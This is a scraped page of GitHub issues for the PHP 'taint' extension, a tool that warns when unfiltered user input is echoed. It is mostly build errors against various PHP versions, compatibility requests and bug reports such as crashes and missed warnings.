/usr/include/php5/Zend/zend_operators.h:485:29: error: request for member 'type' in something not a structure or union
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1907:6: note: in expansion of macro 'Z_TYPE'
if (Z_TYPE(PG(http_globals)[TRACK_VARS_GET]) == IS_ARRAY) {
^
/usr/include/php5/Zend/zend_operators.h:445:32: error: request for member 'value' in something not a structure or union
#define Z_ARRVAL(zval) (zval).value.ht
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1908:26: note: in expansion of macro 'Z_ARRVAL'
php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_GET]));
^
/usr/include/php5/Zend/zend_operators.h:485:29: error: request for member 'type' in something not a structure or union
#define Z_TYPE(zval) (zval).type
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1911:6: note: in expansion of macro 'Z_TYPE'
if (Z_TYPE(PG(http_globals)[TRACK_VARS_COOKIE]) == IS_ARRAY) {
^
/usr/include/php5/Zend/zend_operators.h:445:32: error: request for member 'value' in something not a structure or union
#define Z_ARRVAL(zval) (zval).value.ht
^
/home/ubuntu/Desktop/taint-taint-2.0.2/taint.c:1912:26: note: in expansion of macro 'Z_ARRVAL'
php_taint_mark_strings(Z_ARRVAL(PG(http_globals)[TRACK_VARS_COOKIE]));
^
make: *** [taint.lo]error 1

PHP 7.2 compatibility

For now build is refused (Unsupported PHP Version ID)

BTW using 7.1 code works (test suite passes)

-# elif PHP_VERSION_ID < 70200
+# elif PHP_VERSION_ID < 70300

Only 1 broken test because of "Deprecated: The each() function is deprecated."

What about allowing 7.2 ?

composer dosen't work

Composer dos not work.It output nothing when I enter any composer command if taint.enable=1.It took me hours to find the problem.

proto string implode(string $separator, array $args)

PHP_FUNCTION(taint_implode) ： #L2377
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "zz", &op1, &op2) == FAILURE) {
ZVAL_FALSE(return_value);
WRONG_PARAM_COUNT;
}

"zz" 和 php src "implode" 不太一样

PHP 7.1 build

/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c: In function 'php_taint_binary_assign_op_helper':
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:774:33: error: 'EXT_TYPE_UNUSED' undeclared (first use in this function)
  if ((!((opline)->result_type & EXT_TYPE_UNUSED))) {
                                 ^
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:774:33: note: each undeclared identifier is reported only once for each function it appears in
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c: In function 'php_taint_binary_assign_op_obj_helper':
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:811:36: error: 'EXT_TYPE_UNUSED' undeclared (first use in this function)
     if ((!((opline)->result_type & EXT_TYPE_UNUSED))) {
                                    ^
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c: In function 'php_taint_binary_assign_op_dim_helper':
/builddir/build/BUILD/php71-php-pecl-taint-2.0.1/NTS/taint.c:883:32: error: 'EXT_TYPE_UNUSED' undeclared (first use in this function)
    if ((opline)->result_type & EXT_TYPE_UNUSED) {
                                ^

build errors with clang in OS X against php 7.0-rc7

MacBook-Pro:php-taint ~$ make
/bin/sh /Users/chris/projects/php-taint/libtool --mode=compile cc  -I. -I/Users/chris/projects/php-taint -DPHP_ATOM_INC -I/Users/chris/projects/php-taint/include -I/Users/chris/projects/php-taint/main -I/Users/chris/projects/php-taint -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/main -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/TSRM -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext/date/lib  -DHAVE_CONFIG_H  -g -O2   -c /Users/chris/projects/php-taint/taint.c -o taint.lo 
mkdir .libs
 cc -I. -I/Users/chris/projects/php-taint -DPHP_ATOM_INC -I/Users/chris/projects/php-taint/include -I/Users/chris/projects/php-taint/main -I/Users/chris/projects/php-taint -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/main -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/TSRM -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext -I/usr/local/Cellar/php70/7.0.0-rc.7/include/php/ext/date/lib -DHAVE_CONFIG_H -g -O2 -c /Users/chris/projects/php-taint/taint.c  -fno-common -DPIC -o .libs/taint.o
/Users/chris/projects/php-taint/taint.c:125:58: error: too many arguments to function call, expected 2, have 3
                if (zend_hash_get_current_data_ex(ht, (void**)&ppzval, &pos) == FAILURE) {
                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                      ^~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_hash.h:171:1: note: 'zend_hash_get_current_data_ex' declared here
ZEND_API zval* ZEND_FASTCALL zend_hash_get_current_data_ex(HashTable *ht, HashPosition *pos);
^
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/main/php_config.h:6:19: note: expanded from macro 'ZEND_API'
# define ZEND_API __attribute__ ((visibility("default")))
                  ^
/Users/chris/projects/php-taint/taint.c:128:13: warning: implicit declaration of function 'Z_TYPE_PP' is invalid in C99
      [-Wimplicit-function-declaration]
        if (Z_TYPE_PP(ppzval) == IS_ARRAY) {
            ^
/Users/chris/projects/php-taint/taint.c:131:4: warning: implicit declaration of function 'Z_STRVAL_PP' is invalid in C99
      [-Wimplicit-function-declaration]
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                        ^
/Users/chris/projects/php-taint/taint.c:131:56: warning: implicit declaration of function 'Z_STRLEN_PP' is invalid in C99
      [-Wimplicit-function-declaration]
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                                                                            ^
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_alloc.h:167:51: note: expanded from macro 'erealloc'
#define erealloc(ptr, size)                                     _erealloc((ptr), (size) ZEND_FILE_LINE_CC ZEND_FILE_LINE_EMPTY_CC)
                                                                                  ^
/Users/chris/projects/php-taint/taint.c:131:26: warning: incompatible integer to pointer conversion passing 'int' to parameter of type 'void *'
      [-Wint-conversion]
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                                              ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_alloc.h:167:43: note: expanded from macro 'erealloc'
#define erealloc(ptr, size)                                     _erealloc((ptr), (size) ZEND_FILE_LINE_CC ZEND_FILE_LINE_EMPTY_CC)
                                                                          ^~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_alloc.h:80:47: note: passing argument to parameter 'ptr' here
ZEND_API void*  ZEND_FASTCALL _erealloc(void *ptr, size_t size ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) ZEND_ATTRIBUTE_ALLOC_SIZE(2);
                                              ^
/Users/chris/projects/php-taint/taint.c:131:24: error: expression is not assignable
                        Z_STRVAL_PP(ppzval) = erealloc(Z_STRVAL_PP(ppzval), Z_STRLEN_PP(ppzval) + 1 + PHP_TAINT_MAGIC_LENGTH);
                        ~~~~~~~~~~~~~~~~~~~ ^
/Users/chris/projects/php-taint/taint.c:140:9: warning: implicit declaration of function 'Z_UNSET_ISREF_P' is invalid in C99
      [-Wimplicit-function-declaration]
        Z_UNSET_ISREF_P(z);
        ^
/Users/chris/projects/php-taint/taint.c:154:9: warning: implicit declaration of function 'safe_free_zval_ptr' is invalid in C99
      [-Wimplicit-function-declaration]
        safe_free_zval_ptr(z);
        ^
/Users/chris/projects/php-taint/taint.c:162:4: warning: implicit declaration of function 'Z_SET_ISREF_P' is invalid in C99
      [-Wimplicit-function-declaration]
                        Z_SET_ISREF_P(z);
                        ^
/Users/chris/projects/php-taint/taint.c:167:38: error: unknown type name 'zend_compiled_variable'; did you mean 'zend_compiler_globals'?
static void php_taint_get_cv_address(zend_compiled_variable *cv, zval ***ptr, temp_variable *Ts TSRMLS_DC) /* {{{ */ {
                                     ^~~~~~~~~~~~~~~~~~~~~~
                                     zend_compiler_globals
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:25:39: note: 'zend_compiler_globals' declared here
typedef struct _zend_compiler_globals zend_compiler_globals;
                                      ^
/Users/chris/projects/php-taint/taint.c:167:79: error: unknown type name 'temp_variable'
static void php_taint_get_cv_address(zend_compiled_variable *cv, zval ***ptr, temp_variable *Ts TSRMLS_DC) /* {{{ */ {
                                                                              ^
/Users/chris/projects/php-taint/taint.c:171:2: warning: implicit declaration of function 'zend_hash_quick_update' is invalid in C99
      [-Wimplicit-function-declaration]
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
        ^
/Users/chris/projects/php-taint/taint.c:171:54: error: no member named 'name' in 'struct _zend_compiler_globals'
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                                        ~~  ^
/Users/chris/projects/php-taint/taint.c:171:64: error: no member named 'name_len' in 'struct _zend_compiler_globals'
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                                                  ~~  ^
/Users/chris/projects/php-taint/taint.c:171:80: error: no member named 'hash_value' in 'struct _zend_compiler_globals'
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                                                                  ~~  ^
/Users/chris/projects/php-taint/taint.c:171:28: error: no member named 'active_symbol_table' in 'struct _zend_executor_globals'; did you mean
      'valid_symbol_table'?
        zend_hash_quick_update(EG(active_symbol_table), cv->name, cv->name_len+1, cv->hash_value, &new_zval, sizeof(zval *), (void **)ptr);
                                  ^~~~~~~~~~~~~~~~~~~
                                  valid_symbol_table
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:46:34: note: expanded from macro 'EG'
# define EG(v) (executor_globals.v)
                                 ^
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals.h:212:12: note: 'valid_symbol_table' declared here
        zend_bool valid_symbol_table;
                  ^
/Users/chris/projects/php-taint/taint.c:176:9: error: no member named 'This' in 'struct _zend_executor_globals'
        if (EG(This)) {
            ~~~^~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:46:34: note: expanded from macro 'EG'
# define EG(v) (executor_globals.v)
                                 ^
/Users/chris/projects/php-taint/taint.c:177:14: error: no member named 'This' in 'struct _zend_executor_globals'
                return &EG(This);
                        ~~~^~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_globals_macros.h:46:34: note: expanded from macro 'EG'
# define EG(v) (executor_globals.v)
                                 ^
/Users/chris/projects/php-taint/taint.c:186:32: error: use of undeclared identifier 'IS_BOOL'
                || (Z_TYPE_PP(object_ptr) == IS_BOOL && Z_LVAL_PP(object_ptr) == 0)
                                             ^
/Users/chris/projects/php-taint/taint.c:186:43: warning: implicit declaration of function 'Z_LVAL_PP' is invalid in C99
      [-Wimplicit-function-declaration]
                || (Z_TYPE_PP(object_ptr) == IS_BOOL && Z_LVAL_PP(object_ptr) == 0)
                                                        ^
/Users/chris/projects/php-taint/taint.c:191:3: warning: incompatible pointer types initializing 'zval *' (aka 'struct _zval_struct *') with an
      expression of type 'zval **' (aka 'struct _zval_struct **'); dereference with * [-Wincompatible-pointer-types]
                SEPARATE_ZVAL_IF_NOT_REF(object_ptr);
                ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/usr/local/Cellar/php70/7.0.0-rc.7/include/php/Zend/zend_types.h:967:9: note: expanded from macro 'SEPARATE_ZVAL_IF_NOT_REF'
                zval *_zv = (zv);                                                               \
                      ^     ~~~~
/Users/chris/projects/php-taint/taint.c:487:42: error: unknown type name 'zend_uint'
static zval * php_taint_get_zval_ptr_var(zend_uint var, const temp_variable *Ts, taint_free_op *should_free TSRMLS_DC) /* {{{ */ {
                                         ^
/Users/chris/projects/php-taint/taint.c:487:63: error: unknown type name 'temp_variable'
static zval * php_taint_get_zval_ptr_var(zend_uint var, const temp_variable *Ts, taint_free_op *should_free TSRMLS_DC) /* {{{ */ {
                                                              ^
/Users/chris/projects/php-taint/taint.c:488:14: error: expected expression
        zval *ptr = TAINT_TS(var).var.ptr;
                    ^
./php_taint.h:124:44: note: expanded from macro 'TAINT_TS'
#define TAINT_TS(offset) (*(temp_variable *)((char *)Ts + offset))
                                           ^
/Users/chris/projects/php-taint/taint.c:488:14: error: use of undeclared identifier 'temp_variable'
./php_taint.h:124:29: note: expanded from macro 'TAINT_TS'
#define TAINT_TS(offset) (*(temp_variable *)((char *)Ts + offset))
                            ^
/Users/chris/projects/php-taint/taint.c:493:41: error: unknown type name 'zend_uint'
static zval * php_taint_get_zval_ptr_cv(zend_uint var, int type TSRMLS_DC) /* {{{ */ {
                                        ^
/Users/chris/projects/php-taint/taint.c:494:17: error: no member named 'CVs' in 'struct _zend_execute_data'
        zval ***ptr = &TAINT_CV_OF(var);
                       ^~~~~~~~~~~~~~~~
./php_taint.h:120:55: note: expanded from macro 'TAINT_CV_OF'
#define TAINT_CV_OF(i)     (EG(current_execute_data)->CVs[i])
                            ~~~~~~~~~~~~~~~~~~~~~~~~  ^
/Users/chris/projects/php-taint/taint.c:497:3: error: use of undeclared identifier 'zend_compiled_variable'
                zend_compiled_variable *cv = &TAINT_CV_DEF_OF(var);
                ^
/Users/chris/projects/php-taint/taint.c:497:27: error: use of undeclared identifier 'cv'
                zend_compiled_variable *cv = &TAINT_CV_DEF_OF(var);
                                        ^
fatal error: too many errors emitted, stopping now [-ferror-limit=]
10 warnings and 20 errors generated.
make: *** [taint.lo] Error 1

Support for newer PHP versions

Any hopes for support on newer php versions, like 5.5, 5.6? This is an awesome extension, but we really can't use it on our up-to-date server :(

It doesn't work in most cases from your example

<?php
ini_set(‘taint.enable’, ‘On’);
ini_set(‘taint.error_level’, E_WARNING);
ini_set(‘display_errors’ , 1);
error_reporting(E_ALL);

$a = trim($_GET[‘a’]);
$output    = “Welcome, {$a} !!!“;
$var       = “output”;
//№1
echo $a; // Warning;
//№2
echo $output; //NO WARNING;
//№3
echo $$var; //NO WARNING;

Expected:
3 Warnings, one warning for each case (№1, №2, №3)
Actual:
1 Warning, only for №1

Environment:
php -v

PHP 7.1.22 (cli) (built: Sep 15 2018 03:54:08) ( NTS )
Copyright (c) 1997-2018 The PHP Group
Zend Engine v3.1.0, Copyright (c) 1998-2018 Zend Technologies
    with Zend OPcache v7.1.22, Copyright (c) 1999-2018, by Zend Technologies
    with Xdebug v2.5.5, Copyright (c) 2002-2017, by Derick Rethans
    with blackfire v1.23.0~linux-x64-non_zts71, https://blackfire.io, by Blackfire

cat /etc/issue

Debian GNU/Linux 8 \n \l

PHP 7.2.6 SIGSEGV

Not sure how to debug this, but when Taint is enabled, the following causes problems:

<?php
    echo substr('abc', 0, 2);
?>

I'm wondering if this might have something to do with the op-code cache... as it works when it's using something that's variable (e.g. rand())... and it often works the first time it's run (but not always).

My current setup includes:

PHP 7.2.6, using php-fpm, on MacOS 10.13.5, using:

  brew install httpd24 --with-privileged-ports --with-http2
  brew install php72 --with-pear --with-fpm --with-homebrew-curl

Taint 2.0.4, installed via pecl install taint

And when running it from the command line, it's fine:

/usr/local/bin/php -f index.php
ab

The logs include:

/usr/local/var/log/php-fpm.log

[06-Jun-2018 16:49:10] WARNING: [pool www] child 22475 exited on signal 11 (SIGSEGV) after 3.296677 seconds from start
[06-Jun-2018 16:49:10] NOTICE: [pool www] child 22478 started

/private/var/log/apache2/error_log

[Wed Jun 06 16:49:10.121028 2018] [proxy_fcgi:error] [pid 21745:tid 123145330524160] [client 10.211.55.2:55360] AH01067: Failed to read FastCGI header
[Wed Jun 06 16:49:10.121247 2018] [proxy_fcgi:error] [pid 21745:tid 123145330524160] (54)Connection reset by peer: [client 10.211.55.2:55360] AH01075: Error dispatching request to :

/private/var/log/apache2/access_log

10.211.55.2 - - [-] [-] [2018-06-06 16:49:10] "GET / HTTP/2.0" 503 299 "-" "curl/7.54.0"

And the php.log is empty.

I assume it's un-related, but the script:

<?php
    echo substr(rand(1, 2), 0, 2);
?>

Won't complain when rand() returns 2, but does when it returns 1:

<br />
<b>Warning</b>:  main() [echo]: Attempt to echo a string that might be tainted in <b>.../index.php</b> on line <b>2</b><br />
1

compatibility with PHP 5.3.3

PHP version 5.3.3 is the version that ships with Redhat Enterprise Linux 6 and CentOS 6.

make test will return the following on these systems:

Warning: PHP Startup: Unable to load dynamic library '/usr/local/src/taint-1.2.2/modules/taint.so' - /usr/local/src/taint-1.2.2/modules/taint.so: undefined symbol: INIT_PZVAL_COPY in Unknown on line 0

and compared to a php 5.4 installation, INIT_PZVAL_COPY is truly not defined in /usr/include/php/Zend/zend.h.

Is there any way to get taint working with the php version shipped by RHEL/CentOS?

doesnt work with xdebug enabled

I am running php7.0.14 on ubuntu 14 and taint doesnt output any warnings when xdebug is loaded at the same time.

disabling the xdebug extension results into warnings beeing printed.

I am testing with the very simple example from the readme.

Use valid identifier for taint/untaint() varargs in ReflectionParameter->getName() instead of `$...`

taint/taint.c

Lines 37 to 45 in 2deabd5

    
           ZEND_BEGIN_ARG_INFO_EX(taint_arginfo, 0, 0, 1) 
        
           	ZEND_ARG_INFO(1, string) 
        
           	ZEND_ARG_INFO(1, ...) 
        
           ZEND_END_ARG_INFO() 
        
           ZEND_BEGIN_ARG_INFO_EX(untaint_arginfo, 0, 0, 1) 
        
           	ZEND_ARG_INFO(1, string) 
        
           	ZEND_ARG_INFO(1, ...) 
        
           ZEND_END_ARG_INFO()

Observed: ... used as the getName()
Desired: args or some other valid php identifier for a variable name

This would be equivalent to function taint($string, $...), where ... is not a valid php identifier and it would be impossible for a user-defined function to use ... as a parameter name.

The use of an invalid identifier may cause issues for tools/ides/scripts that extract argument names from Reflection information.

(For https://wiki.php.net/rfc/named_params , the argument names of variadics don't actually matter, but tooling being able to extract valid identifiers from extensions is convenient)

(I'm currently working on checking dozens of extensions reflection information for consistency with other sources of type/parameter names)

	ZEND_BEGIN_ARG_INFO_EX(taint_arginfo, 0, 0, 1)
	ZEND_ARG_INFO(1, string)
	ZEND_ARG_INFO(1, ...)
	ZEND_END_ARG_INFO()

	ZEND_BEGIN_ARG_INFO_EX(untaint_arginfo, 0, 0, 1)
	ZEND_ARG_INFO(1, string)
	ZEND_ARG_INFO(1, ...)
	ZEND_END_ARG_INFO()

laruence / taint Goto Github PK

taint's Introduction

Taint

Requirement

NOTE

Install

Compile taint in Linux

Usage

taint's People

Contributors

Stargazers

Watchers

Forkers

taint's Issues

error "Unsupported PHP Version ID:" PHP_VERSION_ID

Test script:

Expected result:

Actual result:

Abstract(English)

（中文）问题详述

编译环境

待编译内容

重现步骤

预期结果

故障结果

当前缓解/变通方法

error "Unsupported PHP Version ID:" PHP_VERSION_ID

define EXPECTED(condition) __builtin_expect(condition, 1)

define EXPECTED(condition) __builtin_expect(condition, 1)

define UNEXPECTED(condition) __builtin_expect(condition, 0)

define UNEXPECTED(condition) __builtin_expect(condition, 0)

define EXPECTED(condition) __builtin_expect(condition, 1)

define EXPECTED(condition) __builtin_expect(condition, 1)

define EXPECTED(condition) __builtin_expect(condition, 1)

Recommend Projects

Recommend Topics

Recommend Org